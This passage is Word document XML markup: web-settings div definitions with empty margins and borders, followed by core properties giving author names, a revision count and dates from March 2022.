          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="316540245">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="581186052">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1711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6010">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2090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1CDD-22D5-4A0C-827C-0DE83632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Zhao</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Yasin Khan</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-02T00:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-06T01:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>